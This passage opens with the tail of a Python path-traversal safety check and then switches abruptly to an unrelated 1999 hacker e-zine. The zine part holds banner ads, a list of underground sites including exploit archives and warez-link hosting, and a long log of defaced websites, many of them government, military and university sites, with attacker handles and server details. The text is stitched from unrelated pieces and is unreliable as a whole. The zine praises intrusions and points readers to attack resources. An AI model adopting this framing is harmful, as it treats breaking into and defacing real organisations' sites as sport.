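            print(f"{req:32} -> {safe_path(root, req)}")
        except TraversalError as err:
            print(f"{req:32} -> REJECTED ({err})")
```

Because the check is lexical, the same function can also be run over web-server access logs to flag requests that would have escaped the root, which is the detection side of the same bug.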
--- Advisory RFP9906 ----------------------------- rfp.labs ----------- @HWAA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. 
http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... 
SITE.1 Sometimes we have zip sometimes we have lots....here's some sites to check out

http://www.yaromat.com/macos8/index.htm

Cool site, not security related but has a neat effect, 'converts your windows 9x box to MacOS8' - use Netscape for best results. - Duro

http://www.hack.co.za

Recently updated with new sections, check it out.

http://www.sentinel.dircon.co.uk/

Good H/P/A site with lots of older texts and a good layout. Check it out...

http://www.pfuca.com/products/hhkb/

The 'hackers' keyboard, this keyboard is a small footprint, multi-os compatible keyboard, check it out... - Ed

http://www.piratecity.com/rules.htm

Free underground website hosting, 20MB free, soon to have email ala hotmail too, check this site out if you want to run a site and are sick of the usual free provider restrictions.

Rules: Our Simple Terms and Conditions

NO WAREZ (pirate software) CAN BE ACTUALLY STORED ON OUR SERVERS but you can have links to warez stored elsewhere. This is because of bandwidth concerns.

NO ADULT MATERIAL WHATSOEVER WILL BE TOLERATED. Please find a FREE adult website provider for such material there are many out there.

NO SPAMMING! If you spam we will terminate your account immediately and notify your ISP.

NO manipulation of our advertising banner or link and . This pays for your free webspace and the work that goes into Piratecity.com

NO using your site as a storage site for another site or passwording your site.

NO normal mundane sites, go to Fortunecity.com for that kind of stuff!

That's it.

-=-

http://www.nethersearch.com/

Underground search portal with a lot of local content too, well worth checking out HWA is also mirrored there, and a lot of decent tutorials and the like can be found within this site. Check her out.
http://www.bigbrotherinside.com/

Privacy advocates speak out about the branding of all PIII chips with a software recoverable id code embedded in all PIII chips, sure you can turn it off with software but be warned it can also be turned on again remotely without your knowledge, check this site out for more details. (See section 30.0 too) - Repluzer

http://www.bugnet.com/

First off, it's pay which sucks. Secondly this site is a teaser with some 'free' bug alerts, and hacks, synopsis: subscribe to BUGTRAQ and visit Security Focus instead. - sAs-

http://www.ussrback.com/

Security services website, offers many homegrown advisories and current exploits. Nasty background is kinda hard on the eyes but otherwise a nice layout and full of good info, watch for lots of stuff from this site in here. - Ed

You can Send in submissions for this section too if you've found (or RUN) a cool site...

@HWA

H.W Hacked websites
    ~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist.

>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

* Info supplied by the attrition.org mailing list.
Defaced domain: www.koko.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.koko.gov.my
Defaced by: nugz
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.clubber.co.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.clubber.co.uk
Defaced by: ContrOl-C
Operating System: BSDI 4.0 (Apache 1.3.1.1)

Defaced domain: www.pure-elite.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.pure-elite.com
Defaced by: Sabu
Operating System: Solaris 2.6 - 2.7 (Apache 1.3.6)

Defaced domain: www.intelcities.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.intelcities.com
Defaced by: HiP
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.altavista.software.digital.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.altavista.software.digital.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.acerperipherals.co
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.acerperipherals.com
Defaced by: ytcracker
Operating System: Windows NT

Defaced domain: secure.wavetech.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/secure.wavetech.com
Defaced by: Uneek Tech
Operating System: Windows NT

Defaced domain: shadow.fnn.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net
Defaced by: fl13s cr3w
Operating System: Linux (Apache 1.1.3)

Defaced domain: www.record.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.record.org
Defaced by: w0lf
Operating System: Irix (Rapidsite/Apa-1.3.4)

Defaced domain: www.waterworld.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.waterworld.com
Defaced by: globher
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.chicks.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.chicks.net
Defaced by: h4p
Operating System: Linux (Red Hat) (Apache 1.3.9)

Defaced domain: sac.prodam.sp.gov.br
Mirror:
http://www.attrition.org/mirror/attrition/1999/11/15/sac.prodam.sp.gov.br
Defaced by: globher
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.lickass.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.lickass.net
Defaced by: cowhead2000
Operating System: Linux

Defaced domain: www.fesp.rj.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.fesp.rj.gov.br
Defaced by: globher
Operating System: Windows NT

Defaced domain: www.sample.burst.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.sample.burst.n
Defaced by: bansh33
Operating System: Linux (Apache 1.3.9, PHP/mod_frontpage/mod_ssl)

Defaced domain: www.igrejauniversal.com.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.igrejauniversal.com.br
Operating System: Linux (Apache 1.2.4)

Defaced domain: fanta.me.uiuc.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/fanta.me.uiuc.edu
Defaced by: tonekore
Operating System: Linux (Red Hat) (Apache 1.3.6)

Defaced domain: shadow.fnn.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net
Operating System: Linux (Apache 1.1.3)

Defaced domain: 198.116.6.52
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/198.116.6.52
Defaced by: dap
Operating System: RedHat Linux (Apache 1.3.6)

Defaced domain: www.guardtech.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.guardtech.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)

Defaced domain: helpchat.worldnet.att.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/helpchat.worldnet.att
Defaced by: ytcracker
Operating System: Windows NT

Defaced domain: www.statssa.gov.za
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.statssa.gov.za
Defaced by: globher
Operating System: Windows NT

Defaced domain: www.mcdonalds.com.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.mcdonalds.com.au
Defaced by: dukj
Operating System: Windows NT
Defaced domain: www.fsiferreira.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.fsiferreira.com
Defaced by: dap
Operating System: Linux

Defaced domain: www.gcpr.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.gcpr.org
Defaced by: rackmount
Operating System: Windows NT

Defaced domain: ntwww.ansys.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/ntwww.ansys.com
Defaced by: rackmount
Operating System: Windows NT

Defaced domain: www.ofcm.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.ofcm.gov
Defaced by: rackmount
Operating System: Windows NT

Defaced domain: www.aiwa.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.aiwa.com
Defaced by: rackmount
Operating System: Windows NT

Defaced domain: www.willieesco.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.willieesco.com
Defaced by: h4x0ring f0r swedish grlz
Operating System: Linux

Defaced domain: beta.millicent.digital.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/beta.millicent.digital.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)

Defaced domain: www.wings.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.wings.com
Defaced by: sSh
Operating System: Windows NT

Defaced domain: www.apptech-cc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.apptech-cc.com
Defaced by: Digital Domination
Operating System: Digital Unix

Defaced domain: www.crystaltips.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.crystaltips.com
Defaced by: bansh33
Operating System: Linux

Defaced domain: www.melissa.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.melissa.com
Defaced by: p4riah
Operating System: Solaris (Apache 1.3.3)

Defaced domain: boubakar.cit.nih.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/boubakar.cit.nih.gov Defaced by: max Operating System: Linux Defaced domain: www-curator.jsc.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www-curator.jsc.nasa.gov Defaced by: ytcracker Operating System: Windows NT Defaced domain: www.cyoc.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cyoc.org Defaced by: weLLfare Operating System: Solaris Defaced domain: aabea.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/aabea.org Defaced by: BreAc0n Operating System: Red Hat Linux Defaced domain: www.mute300.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.mute300.net Defaced by: Sabu Operating System: FreeBSD Defaced domain: www.tcs.com.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.tcs.com.sg Defaced by: Sarin Operating System: Windows NT Defaced domain: www.dare.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.dare.com Defaced by: Coolio Operating System: Irix Defaced domain: n1-3-6.irt.drexel.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/n1-3-6.irt.drexel.edu Defaced by: sSh Operating System: Windows NT Defaced domain: www.babybook.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.babybook.net Defaced by: globher Operating System: Windows NT Defaced domain: www.hershey.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.hershey.com Defaced by: Sesame Street Hackers (sSh) Operating System: Windows NT Defaced domain: www.mcdonalds.com.au Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.mcdonalds.com.au Defaced by: globher Operating System: Windows NT Defaced domain: www.webspawn.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.webspawn.com Operating System: BSDI Defaced domain: redskin.dap.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/redskin.dap.ch Defaced by: Sesame Street Hax0rz 
Operating System: Red Hat Linux Defaced domain: www.cvm.tamu.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cvm.tamu.edu Defaced by: sSh Operating System: Windows NTY Defaced domain: www.aceralliance.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.aceralliance.com Defaced by: Sesame Street Hax0rz Operating System: Windows NT Defaced domain: www.phe.queensu.ca Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.phe.queensu.ca Operating System: Linux Defaced domain: www.phoenixcomms.com.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.phoenixcomms.com.sg Defaced by: un33k t3ch Operating System: Windows NT (IIS/3.0) Defaced domain: www.chicks.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.chicks.net Defaced by: unknown Operating System: Linux (Red Hat) (Apache 1.3.9) Defaced domain: www.dcrt.nih.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.dcrt.nih.gov Defaced by: h2Vk Operating System: Windows NT (IIS/4.0) Defaced domain: www.dcrt.nih.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.dcrt.nih.gov Defaced by: h2Vk Operating System: Windows NT (IIS/4.0) Defaced domain: www.aar.tc.faa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.aar.tc.faa.gov Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.ohio.doe.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ohio.doe.gov Defaced by: hV2k Operating System: Windows NT (IIS/4.0) Defaced domain: www.gc.doe.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov Defaced by: h2Vk Operating System: Windows NT (IIS/4.0) Defaced domain: www.gc.doe.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov Defaced by: globher Operating System: Windows NT Defaced domain: www.igrejauniversal.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.igrejauniversal.com.br 
Defaced by: Maverick Operating System: Linux Defaced domain: abacus.mc.duke.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/abacus.mc.duke.edu Defaced by: Verb0 Operating System: Windows NT Defaced domain: www.oarhq.noaa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.oarhq.noaa.gov Defaced by: Sesame Street Hax0rz Operating System: Windows NT Defaced domain: www.monica-lewinsky.org (yeah yet again) Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.monica-lewinsky.org Defaced by: ne0h Operating System: BSDI Defaced domain: www.theblue.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.theblue.net Defaced by: knell Operating System: Linux Defaced domain: www.fesp.rj.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.fesp.rj.gov.br Defaced by: p4riah Operating System: WIndows NT Defaced domain: www.waterworld.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.waterworld.com Defaced by: p4riah Operating System: Windows NT Defaced domain: seb.ce.gatech.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/seb.ce.gatech.edu Defaced by: spinkus Operating System: Solaris Defaced domain: assinet.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/assinet.com Defaced by: twd Operating System: Windows NT Defaced domain: www.svic.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.svic.net Defaced by: twd Operating System: Windows NT Defaced domain: stinkdog.bidmc.harvard.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/stinkdog.bidmc.harvard.edu Operating System: Red Hat Linux Defaced domain: www.congruentsoft.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.congruentsoft.com Defaced by: twd Operating System: Windows NT (IIS/4.0) Defaced domain: netcommerce.com.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/netcommerce.com.sg Defaced by: twd Operating System: Windows NT 
(IIS/4.0) Defaced domain: www.spykee.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.spykee.com Operating System: OpenBSD 2.4 (Apache 1.3.9) Defaced domain: www.ssp.df.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ssp.df.gov.br Defaced by: JLM Operating System: Windows NT (IIS/4.0) Defaced domain: www.firebat.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.firebat.net Defaced by: Sabu and Six Operating System: Windows NT (IIS/4.0) Defaced domain: www.muis.gov.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.muis.gov.sg Defaced by: Sarin Operating System: Windows NT (IIS/4.0) Defaced domain: registry.faa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/registry.faa.gov Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: atsy2k.faa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/atsy2k.faa.gov Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.teamdawghouse.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.teamdawghouse.com Defaced by: Sabu Operating System: Linux (Apache 1.3.4) Defaced domain: www.learncomm.org Site Title: Kiel Woodward Associates Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.learncomm.org Defaced by: ieet Operating System: Irix (Rapidsite/Apa-1.3.4) Defaced domain: www.ssp.df.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.ssp.df.gov.br Defaced by: Fuby Operating System: Windows NT (IIS/4.0) Defaced domain: www.facsfinancial.com Site Title: Facs Financial Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.facsfinancial.com Defaced by: sSh Operating System: Windows NT (IIS/4.0) Defaced domain: www.whiterules.com Site Title: White Rules Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.whiterules.com Defaced by: TWHA Operating System: Linux (Apache 1.3.3) Defaced domain: www.hawgparts.com Site Title: 
P and S Inc Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.hawgparts.com Defaced by: Devil-C Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6) There are hidden comments in the HTML. Defaced domain: www.sect.mg.gov.br Site Title: Secretaria de Estado de CiËncia e Tecnologia de Minas Gerais Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.sect.mg.gov.br Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.senado-ba.gov.ar Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.senado-ba.gov.ar Defaced by: c0rvus Operating System: Windows NT (IIS/4.0) Defaced domain: www.citizens-bank-nm.com Site Title: Citizens Bank Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.citizens-bank-nm.com Operating System: Windows NT (IIS/4.0) Defaced domain: www.moscow-bank.ru Site Title: Moscow Bank Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.moscow-bank.ru Defaced by: dukj Operating System: Windows NT (IIS/4.0) Defaced domain: www.pobis.net Site Title: ASIA INFORMATION NETWORK Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.pobis.net Defaced by: Darkness Operating System: Linux (Apache 1.1.1) Defaced domain: wayland.k12.mi.us Site Title: Wayland K12 School (MI) Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/wayland.k12.mi.us Defaced by: Darkness Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.caloritec.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.caloritec.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.markowitzmail.com Site Title: Markowitz Mall Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.markowitzmail.com Defaced by: sSh Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.pathword.com Site Title: Roger Solioz (PATHWORD-DOM) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.pathword.com Defaced 
by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.cornu.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cornu.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.moneytopics.com Site Title: IPM Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.moneytopics.com Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.techtravel.ch Site Title: Tech Travel (CH) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.techtravel.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.socialinfo.ch Site Title: Social Info (CH) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.socialinfo.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.duqpart.com Site Title: Duquette & Partners, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.duqpart.com Defaced by: sSh Operating System: Linux (Apache 1.3.4) Defaced domain: www.focal.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.focal.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.fullfat.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fullfat. Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server 1.0) domain: www.fifo.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.fifo.ch Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server/1.0) Defaced domain: www.cybergribouille.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.cybergribouille.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.wnym.com Site Title: Western New York Microcomputer, Inc. 
Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.wnym.com Defaced by: sSh Operating System: Linux (Apache 1.3.4) Defaced domain: www.ultramongolia.com Site Title: UltraMongolia Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ultramongolia.com Defaced by: xhostile & acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.swisscentershanghai.com Site Title: SINOPTIC Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.swisscentershanghai.com Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: dogwizard.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/dogwizard.com Defaced by: CodeZero Operating System: Linux (Apache 1.3.6) There are hidden comments in the HTML. Defaced domain: www.sinoptic.ch Site Title: Sinoptic Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sinoptic.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.medtechnet.com Site Title: Med TechNet Online Information Services Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.medtechnet.com Defaced by: sSh Operating System: Linux (Apache 1.3.4) Defaced domain: www.siavd.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.siavd.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.digitoner.ch Site Title: DigiToner (CH) Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.digitoner.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.ipem.mg.gov.br Site Title: Instituto de Pesos e Medidas do Estado de Minas Gerais Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.ipem.mg.gov.br Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.guixe.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.guixe.com Defaced by: acidklown Operating System: 
Windows NT (Elogia Web Server 1.0) Defaced domain: www.iug.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.iug.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.sis-china.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.sis-china.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.reymondsa.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.reymondsa.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: www.centovisi.ch Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.centovisi.ch Defaced by: acidklown Operating System: Windows NT (Elogia Web Server 1.0) Defaced domain: meetingout.senate.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov Defaced by: sSh Operating System: NT Defaced domain: wsg6.ngdc.noaa.gov Site Title: National Oceanic and Atmospheric Administration Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wsg6.ngdc.noaa.gov Defaced by: Spykee Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.csc-ing.com Site Title: Computer Sciences Corporation Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.csc-ing.com Defaced by: dagger Operating System: Windows NT (IIS/4.0) Defaced domain: crack.neurobio.ucla.edu Site Title: University of California, Los Angeles Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/crack.neurobio.ucla.edu Defaced by: spykee Operating System: Red Hat Linux (Apache 1.3.3) Defaced domain: bing.ngdc.noaa.gov Site Title: National Oceanic and Atmospheric Administration Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/bing.ngdc.noaa.gov Defaced by: Spykee Operating System: Red Hat Linux (Apache 1.3.6) Defaced domain: www.jrtc-polk.army.mil Site Title: Joint Readiness Training Centre & Fort Polk Mirror: 
http://www.attrition.org/mirror/attrition/1999/11/20/www.jrtc-polk.army.mil Defaced by: Pakistan Hackerz Club Operating System: Windows NT Defaced domain: www.comunidadebr.com.br Site Title: Comunidade Brazil Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.comunidadebr.com.br Defaced by: globher Operating System: Windows NT Defaced domain: wwwnhc.nhmccd.cc.tx.us Site Title: North Harris College Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/wwwnhc.nhmccd.cc.tx.us Defaced by: sect0r Operating System: Windows NT Defaced domain: www.lic.gov.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.lic.gov.uk Defaced by: Kryptek Operating System: Solaris (Apache 1.2.4) Defaced domain: gw.fresno.gov Site Title: City of Fresno Gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/gw.fresno.gov Defaced by: globher Operating System: Windows NT (IIS/4.0) URL: www.brick.net Defaced domain: www.brick.net Site Title: Loopback Inc Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brick.net Defaced by: cesar Operating System: BSDI 3.0 (Apache 1.3.9) URL: www.afree.net Defaced domain: www.afree.net Site Title: A Free Net Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.afree.net Operating System: BSDI 3.0 (Apache 1.3.9) URL: intra-cas.faa.gov Defaced domain: intra-cas.faa.gov Site Title: Federal Aviation Administration Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/intra-cas.faa.gov Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) URL: smagazine.simplenet.com Defaced domain: smagazine.simplenet.com Site Title: Simple Network Communications Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/smagazine.simplenet.com Operating System: Solaris (Apache 1.3.9) URL: www.nekipo.ee Defaced domain: www.nekipo.ee Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.nekipo.ee Defaced by: verb0 Operating System: Windows NT (IIS/4.0) URL: www.andmevara.ee 